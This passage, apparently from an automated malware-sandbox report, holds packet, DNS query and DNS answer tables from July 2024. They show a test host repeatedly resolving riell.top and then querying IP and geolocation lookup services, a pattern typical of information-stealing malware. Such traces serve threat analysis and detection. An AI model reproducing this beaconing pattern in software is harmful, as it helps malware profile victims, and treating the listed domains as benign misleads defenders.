                    Jul 4, 2024 21:38:49.377774000 CEST49181443192.168.2.22188.114.96.3
                    Jul 4, 2024 21:38:49.377795935 CEST44349181188.114.96.3192.168.2.22
                    Jul 4, 2024 21:38:49.573259115 CEST44349181188.114.96.3192.168.2.22
                    Jul 4, 2024 21:38:49.573349953 CEST44349181188.114.96.3192.168.2.22
                    Jul 4, 2024 21:38:49.573621988 CEST49181443192.168.2.22188.114.96.3
                    Jul 4, 2024 21:38:49.573945045 CEST49181443192.168.2.22188.114.96.3
                    Jul 4, 2024 21:38:49.585875988 CEST4918080192.168.2.22132.226.247.73
                    Jul 4, 2024 21:38:49.591025114 CEST8049180132.226.247.73192.168.2.22
                    Jul 4, 2024 21:38:49.591097116 CEST4918080192.168.2.22132.226.247.73
                    Jul 4, 2024 21:38:49.611133099 CEST4918280192.168.2.22132.226.8.169
                    Jul 4, 2024 21:38:49.619210005 CEST8049182132.226.8.169192.168.2.22
                    Jul 4, 2024 21:38:49.619283915 CEST4918280192.168.2.22132.226.8.169
                    Jul 4, 2024 21:38:49.619333982 CEST4918280192.168.2.22132.226.8.169
                    Jul 4, 2024 21:38:49.626729012 CEST8049182132.226.8.169192.168.2.22
                    Jul 4, 2024 21:38:50.781601906 CEST8049182132.226.8.169192.168.2.22
                    Jul 4, 2024 21:38:50.797463894 CEST49183443192.168.2.22188.114.96.3
                    Jul 4, 2024 21:38:50.797501087 CEST44349183188.114.96.3192.168.2.22
                    Jul 4, 2024 21:38:50.797580957 CEST49183443192.168.2.22188.114.96.3
                    Jul 4, 2024 21:38:50.797837973 CEST49183443192.168.2.22188.114.96.3
                    Jul 4, 2024 21:38:50.797849894 CEST44349183188.114.96.3192.168.2.22
                    Jul 4, 2024 21:38:50.987988949 CEST4918280192.168.2.22132.226.8.169
                    Jul 4, 2024 21:38:50.989830017 CEST8049182132.226.8.169192.168.2.22
                    Jul 4, 2024 21:38:50.992314100 CEST4918280192.168.2.22132.226.8.169
                    Jul 4, 2024 21:38:51.281749964 CEST44349183188.114.96.3192.168.2.22
                    Jul 4, 2024 21:38:51.287225962 CEST49183443192.168.2.22188.114.96.3
                    Jul 4, 2024 21:38:51.287239075 CEST44349183188.114.96.3192.168.2.22
                    Jul 4, 2024 21:38:51.422379971 CEST44349183188.114.96.3192.168.2.22
                    Jul 4, 2024 21:38:51.422451019 CEST44349183188.114.96.3192.168.2.22
                    Jul 4, 2024 21:38:51.422660112 CEST49183443192.168.2.22188.114.96.3
                    Jul 4, 2024 21:38:51.422962904 CEST49183443192.168.2.22188.114.96.3
                    Jul 4, 2024 21:38:51.435355902 CEST4918280192.168.2.22132.226.8.169
                    Jul 4, 2024 21:38:51.440567970 CEST8049182132.226.8.169192.168.2.22
                    Jul 4, 2024 21:38:51.440634012 CEST4918280192.168.2.22132.226.8.169
                    Jul 4, 2024 21:38:51.455338955 CEST4918480192.168.2.22158.101.44.242
                    Jul 4, 2024 21:38:51.460565090 CEST8049184158.101.44.242192.168.2.22
                    Jul 4, 2024 21:38:51.460638046 CEST4918480192.168.2.22158.101.44.242
                    Jul 4, 2024 21:38:51.460690022 CEST4918480192.168.2.22158.101.44.242
                    Jul 4, 2024 21:38:51.466067076 CEST8049184158.101.44.242192.168.2.22
                    Jul 4, 2024 21:38:52.037347078 CEST8049184158.101.44.242192.168.2.22
                    Jul 4, 2024 21:38:52.057205915 CEST49185443192.168.2.22188.114.97.3
                    Jul 4, 2024 21:38:52.057255030 CEST44349185188.114.97.3192.168.2.22
                    Jul 4, 2024 21:38:52.057311058 CEST49185443192.168.2.22188.114.97.3
                    Jul 4, 2024 21:38:52.057631016 CEST49185443192.168.2.22188.114.97.3
                    Jul 4, 2024 21:38:52.057647943 CEST44349185188.114.97.3192.168.2.22
                    Jul 4, 2024 21:38:52.234733105 CEST4918480192.168.2.22158.101.44.242
                    Jul 4, 2024 21:38:52.538580894 CEST44349185188.114.97.3192.168.2.22
                    Jul 4, 2024 21:38:52.542145014 CEST49185443192.168.2.22188.114.97.3
                    Jul 4, 2024 21:38:52.542188883 CEST44349185188.114.97.3192.168.2.22
                    Jul 4, 2024 21:38:52.679672003 CEST44349185188.114.97.3192.168.2.22
                    Jul 4, 2024 21:38:52.679754019 CEST44349185188.114.97.3192.168.2.22
                    Jul 4, 2024 21:38:52.680283070 CEST49185443192.168.2.22188.114.97.3
                    Jul 4, 2024 21:38:52.680891037 CEST49185443192.168.2.22188.114.97.3
                    Jul 4, 2024 21:39:50.821662903 CEST8049176158.101.44.242192.168.2.22
                    Jul 4, 2024 21:39:50.821801901 CEST4917680192.168.2.22158.101.44.242
                    Jul 4, 2024 21:39:57.039510965 CEST8049184158.101.44.242192.168.2.22
                    Jul 4, 2024 21:39:57.039606094 CEST4918480192.168.2.22158.101.44.242
                    Jul 4, 2024 21:40:32.060733080 CEST4918480192.168.2.22158.101.44.242
                    Jul 4, 2024 21:40:32.065638065 CEST8049184158.101.44.242192.168.2.22

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jul 4, 2024 21:38:23.992229939 CEST5456253192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:24.591535091 CEST53545628.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:26.436096907 CEST5291753192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:26.448363066 CEST53529178.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:26.450126886 CEST6275153192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:26.461026907 CEST53627518.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:30.387315989 CEST5789353192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:30.394522905 CEST53578938.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:30.397080898 CEST5482153192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:30.403829098 CEST53548218.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:31.474174023 CEST5471953192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:31.488965034 CEST53547198.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:31.490118027 CEST4988153192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:31.497627020 CEST53498818.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:33.005484104 CEST5499853192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:33.017782927 CEST53549988.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:33.020697117 CEST5278153192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:33.115381002 CEST53527818.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:36.066443920 CEST6392653192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:36.074003935 CEST53639268.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:39.015136003 CEST6551053192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:39.021970987 CEST53655108.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:39.118216991 CEST6267253192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:39.125556946 CEST53626728.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:40.214000940 CEST5647553192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:40.220890999 CEST53564758.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:40.222974062 CEST4938453192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:40.229613066 CEST53493848.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:40.245145082 CEST5484253192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:40.257487059 CEST53548428.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:41.702188969 CEST5810553192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:41.708960056 CEST53581058.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:41.710690022 CEST6492853192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:41.717355013 CEST53649288.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:42.463310957 CEST5739053192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:42.469697952 CEST53573908.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:42.480763912 CEST5809553192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:42.487715960 CEST53580958.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:43.171099901 CEST5426153192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:43.408374071 CEST53542618.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:43.408622980 CEST5426153192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:43.420458078 CEST53542618.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:44.078524113 CEST6050753192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:44.085685968 CEST53605078.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:44.087956905 CEST5044653192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:44.094325066 CEST53504468.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:45.829417944 CEST5593953192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:45.836422920 CEST53559398.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:46.714828014 CEST4960853192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:46.721872091 CEST53496088.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:46.725192070 CEST6148653192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:46.731561899 CEST53614868.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:47.449202061 CEST6245353192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:47.455936909 CEST53624538.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:48.105139017 CEST5056853192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:48.111586094 CEST53505688.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:48.114401102 CEST6146753192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:48.121042013 CEST53614678.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:48.866677046 CEST6161853192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:48.877582073 CEST53616188.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:49.591061115 CEST5442253192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:49.599879026 CEST53544228.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:49.601973057 CEST5207453192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:49.610836983 CEST53520748.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:50.787220955 CEST5033753192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:50.797138929 CEST53503378.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:51.440439939 CEST6182653192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:51.446749926 CEST53618268.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:51.448702097 CEST5632953192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:51.455014944 CEST53563298.8.8.8192.168.2.22
                    Jul 4, 2024 21:38:52.045350075 CEST6346953192.168.2.228.8.8.8
                    Jul 4, 2024 21:38:52.056853056 CEST53634698.8.8.8192.168.2.22

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Jul 4, 2024 21:38:23.992229939 CEST192.168.2.228.8.8.80xcfeaStandard query (0)riell.topA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:26.436096907 CEST192.168.2.228.8.8.80xb60aStandard query (0)riell.topA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:26.450126886 CEST192.168.2.228.8.8.80xb613Standard query (0)riell.topA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:30.387315989 CEST192.168.2.228.8.8.80x1100Standard query (0)riell.topA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:30.397080898 CEST192.168.2.228.8.8.80x2664Standard query (0)riell.topA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:31.474174023 CEST192.168.2.228.8.8.80xd97eStandard query (0)riell.topA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:31.490118027 CEST192.168.2.228.8.8.80x9c5bStandard query (0)riell.topA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:33.005484104 CEST192.168.2.228.8.8.80x4189Standard query (0)riell.topA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:33.020697117 CEST192.168.2.228.8.8.80x2383Standard query (0)riell.topA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:36.066443920 CEST192.168.2.228.8.8.80x76b5Standard query (0)riell.topA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:39.015136003 CEST192.168.2.228.8.8.80x16efStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:39.118216991 CEST192.168.2.228.8.8.80x5826Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:40.214000940 CEST192.168.2.228.8.8.80x1185Standard query (0)riell.topA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:40.222974062 CEST192.168.2.228.8.8.80x98abStandard query (0)riell.topA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:40.245145082 CEST192.168.2.228.8.8.80xd553Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:41.702188969 CEST192.168.2.228.8.8.80xae0fStandard query (0)riell.topA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:41.710690022 CEST192.168.2.228.8.8.80x61d4Standard query (0)riell.topA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:42.463310957 CEST192.168.2.228.8.8.80x18a5Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:42.480763912 CEST192.168.2.228.8.8.80x7134Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:43.171099901 CEST192.168.2.228.8.8.80x75baStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:43.408622980 CEST192.168.2.228.8.8.80x75baStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:44.078524113 CEST192.168.2.228.8.8.80x2525Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:44.087956905 CEST192.168.2.228.8.8.80x79e7Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:45.829417944 CEST192.168.2.228.8.8.80x3dd9Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:46.714828014 CEST192.168.2.228.8.8.80xbe2dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:46.725192070 CEST192.168.2.228.8.8.80x6bd4Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:47.449202061 CEST192.168.2.228.8.8.80x2c90Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:48.105139017 CEST192.168.2.228.8.8.80x2067Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:48.114401102 CEST192.168.2.228.8.8.80x57fdStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:48.866677046 CEST192.168.2.228.8.8.80x1ed6Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:49.591061115 CEST192.168.2.228.8.8.80x194Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:49.601973057 CEST192.168.2.228.8.8.80x2284Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:50.787220955 CEST192.168.2.228.8.8.80x3e63Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:51.440439939 CEST192.168.2.228.8.8.80x70acStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:51.448702097 CEST192.168.2.228.8.8.80xf6b4Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:52.045350075 CEST192.168.2.228.8.8.80xb809Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Jul 4, 2024 21:38:24.591535091 CEST8.8.8.8192.168.2.220xcfeaNo error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:24.591535091 CEST8.8.8.8192.168.2.220xcfeaNo error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:26.448363066 CEST8.8.8.8192.168.2.220xb60aNo error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:26.448363066 CEST8.8.8.8192.168.2.220xb60aNo error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:26.461026907 CEST8.8.8.8192.168.2.220xb613No error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:26.461026907 CEST8.8.8.8192.168.2.220xb613No error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:30.394522905 CEST8.8.8.8192.168.2.220x1100No error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:30.394522905 CEST8.8.8.8192.168.2.220x1100No error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:30.403829098 CEST8.8.8.8192.168.2.220x2664No error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:30.403829098 CEST8.8.8.8192.168.2.220x2664No error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:31.488965034 CEST8.8.8.8192.168.2.220xd97eNo error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:31.488965034 CEST8.8.8.8192.168.2.220xd97eNo error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:31.497627020 CEST8.8.8.8192.168.2.220x9c5bNo error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:31.497627020 CEST8.8.8.8192.168.2.220x9c5bNo error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:33.017782927 CEST8.8.8.8192.168.2.220x4189No error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:33.017782927 CEST8.8.8.8192.168.2.220x4189No error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:33.115381002 CEST8.8.8.8192.168.2.220x2383No error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:33.115381002 CEST8.8.8.8192.168.2.220x2383No error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:36.074003935 CEST8.8.8.8192.168.2.220x76b5No error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:36.074003935 CEST8.8.8.8192.168.2.220x76b5No error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:39.021970987 CEST8.8.8.8192.168.2.220x16efNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 4, 2024 21:38:39.021970987 CEST8.8.8.8192.168.2.220x16efNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:39.021970987 CEST8.8.8.8192.168.2.220x16efNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:39.021970987 CEST8.8.8.8192.168.2.220x16efNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:39.021970987 CEST8.8.8.8192.168.2.220x16efNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:39.021970987 CEST8.8.8.8192.168.2.220x16efNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:39.125556946 CEST8.8.8.8192.168.2.220x5826No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 4, 2024 21:38:39.125556946 CEST8.8.8.8192.168.2.220x5826No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:39.125556946 CEST8.8.8.8192.168.2.220x5826No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:39.125556946 CEST8.8.8.8192.168.2.220x5826No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:39.125556946 CEST8.8.8.8192.168.2.220x5826No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:39.125556946 CEST8.8.8.8192.168.2.220x5826No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:40.220890999 CEST8.8.8.8192.168.2.220x1185No error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:40.220890999 CEST8.8.8.8192.168.2.220x1185No error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:40.229613066 CEST8.8.8.8192.168.2.220x98abNo error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:40.229613066 CEST8.8.8.8192.168.2.220x98abNo error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:40.257487059 CEST8.8.8.8192.168.2.220xd553No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:40.257487059 CEST8.8.8.8192.168.2.220xd553No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:41.708960056 CEST8.8.8.8192.168.2.220xae0fNo error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:41.708960056 CEST8.8.8.8192.168.2.220xae0fNo error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:41.717355013 CEST8.8.8.8192.168.2.220x61d4No error (0)riell.top188.114.96.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:41.717355013 CEST8.8.8.8192.168.2.220x61d4No error (0)riell.top188.114.97.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:42.469697952 CEST8.8.8.8192.168.2.220x18a5No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 4, 2024 21:38:42.469697952 CEST8.8.8.8192.168.2.220x18a5No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:42.469697952 CEST8.8.8.8192.168.2.220x18a5No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:42.469697952 CEST8.8.8.8192.168.2.220x18a5No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:42.469697952 CEST8.8.8.8192.168.2.220x18a5No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:42.469697952 CEST8.8.8.8192.168.2.220x18a5No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:42.487715960 CEST8.8.8.8192.168.2.220x7134No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 4, 2024 21:38:42.487715960 CEST8.8.8.8192.168.2.220x7134No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:42.487715960 CEST8.8.8.8192.168.2.220x7134No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:42.487715960 CEST8.8.8.8192.168.2.220x7134No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:42.487715960 CEST8.8.8.8192.168.2.220x7134No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:42.487715960 CEST8.8.8.8192.168.2.220x7134No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:43.408374071 CEST8.8.8.8192.168.2.220x75baNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:43.408374071 CEST8.8.8.8192.168.2.220x75baNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:43.420458078 CEST8.8.8.8192.168.2.220x75baNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:43.420458078 CEST8.8.8.8192.168.2.220x75baNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:44.085685968 CEST8.8.8.8192.168.2.220x2525No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 4, 2024 21:38:44.085685968 CEST8.8.8.8192.168.2.220x2525No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:44.085685968 CEST8.8.8.8192.168.2.220x2525No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:44.085685968 CEST8.8.8.8192.168.2.220x2525No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:44.085685968 CEST8.8.8.8192.168.2.220x2525No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:44.085685968 CEST8.8.8.8192.168.2.220x2525No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:44.094325066 CEST8.8.8.8192.168.2.220x79e7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 4, 2024 21:38:44.094325066 CEST8.8.8.8192.168.2.220x79e7No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:44.094325066 CEST8.8.8.8192.168.2.220x79e7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:44.094325066 CEST8.8.8.8192.168.2.220x79e7No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:44.094325066 CEST8.8.8.8192.168.2.220x79e7No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:44.094325066 CEST8.8.8.8192.168.2.220x79e7No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:45.836422920 CEST8.8.8.8192.168.2.220x3dd9No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:45.836422920 CEST8.8.8.8192.168.2.220x3dd9No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:46.721872091 CEST8.8.8.8192.168.2.220xbe2dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 4, 2024 21:38:46.721872091 CEST8.8.8.8192.168.2.220xbe2dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:46.721872091 CEST8.8.8.8192.168.2.220xbe2dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:46.721872091 CEST8.8.8.8192.168.2.220xbe2dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:46.721872091 CEST8.8.8.8192.168.2.220xbe2dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:46.721872091 CEST8.8.8.8192.168.2.220xbe2dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:46.731561899 CEST8.8.8.8192.168.2.220x6bd4No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 4, 2024 21:38:46.731561899 CEST8.8.8.8192.168.2.220x6bd4No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:46.731561899 CEST8.8.8.8192.168.2.220x6bd4No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:46.731561899 CEST8.8.8.8192.168.2.220x6bd4No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:46.731561899 CEST8.8.8.8192.168.2.220x6bd4No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
